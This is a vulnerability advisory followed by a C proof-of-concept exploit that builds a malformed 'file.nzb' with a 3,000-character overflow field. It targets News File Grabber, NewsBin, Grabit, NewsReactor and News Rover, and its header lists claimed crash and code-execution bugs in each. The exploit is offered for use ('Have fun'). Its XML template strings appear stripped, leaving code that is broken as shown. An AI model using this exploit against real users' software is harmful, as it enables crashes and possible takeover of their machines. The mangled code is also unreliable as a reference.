// source: https://www.securityfocus.com/bid/22617/info News File Grabber is prone to a remote stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. Exploiting this issue allows attackers to execute arbitrary machine code in the context of the affected application. This issue affects version 4.1.0.1; other versions may also be affected. /*********************************************************************************************\ * * * NZB Generic 0Day DoS Exploit * * Proofs of Concept for News File Grabber, NewsBin, Grabit, NewsReactor and News Rover * * * * * * Bugs in News Rover <=12.1 Rev 1: * * There's a stack overflow in RoverNZB triggered by files that contains a long subject. * * There's a stack overflow in NewsRover triggered by files that contains a long group. * * To trigger: run file.nzb * * Impact: Code execution on Windows XP, SP1 and SP2 * * * * Bug in News File Grabber 4.1.0.1: * * If the subject field contains a new line, the app will try to exec data in memory. But * * since the address changed every time the app runs it's very hard to exploit. However I * * sometimes got EIP overwritten by my chars * * To trigger: load file.nzb and start download. CPU -> 100% and then Out of Memory error. * * Impact: Code execution on Windows XP, SP1 and SP2 * * * * Bug in Grabit 1.5.3: * * Grabit does not correctly handle fields that contains a semicolon. * * To trigger: Just grab the file * * Impact: DoS * * Note: Grabit 1.6 is not affected. * * * * Bug in NewsReactor: * * There's a heap overflow that occurs when group field is too long. * * To trigger: load file.nzb, click grab. After a few tries to get the file it crashes. * * Impact: Code execution on Windows XP, SP1 and DoS on SP2 * * * * Bug in NewsBin Pro 4.3.2: * * There's a heap overflow that occurs when group field is too long. * * To trigger: load file.nzb, and start download. The app should then be unstable. * * Impact: Code execution on Windows XP, SP1 and DoS on SP2 * * * * Bug in NewsBin Pro 5.33 (maybe others...): * * There's a heap overflow that occurs when group field is too long. * * To trigger: load file.nzb, and start download. Then click "Delete All Posts". Boom! * * Impact: Code execution on Windows XP, SP1 and DoS on SP2 * * Note: Maybe it's possible to exec code on SP2, but there is a lot of bad chars and with the * * stack protection I didn't find a way to jump to a good return address. * * * * Solution: Buy your dvds leecha!!! * * * * * * Coded and discovered by Marsu * * Note: thx aux Bananas et a la KryptonIT. Bon courage aux inuITs :P * \*********************************************************************************************/ #include "stdlib.h" #include "stdio.h" #include "string.h" char nzbheader[]="\n" "\n" "\n" "\n\n"; char nzbend[]="\n" "\n" "\n" "\n"; int main(int argc, char* argv[]) { FILE *file; char * pad; printf("MarsupilamiPowa's Generic NZB DoS Exploit\n"); file=fopen("file.nzb","wb"); fprintf(file,nzbheader); fprintf(file,"\n"); fprintf(file,""); pad = (char*)malloc(sizeof(char)*3000); memset(pad,'A',3000); fprintf(file,pad); fprintf(file,"\n\n"); fprintf(file,"\n;\n"); fprintf(file,nzbend); fclose(file); printf("file.nzb generated! Have fun\n"); return 0; }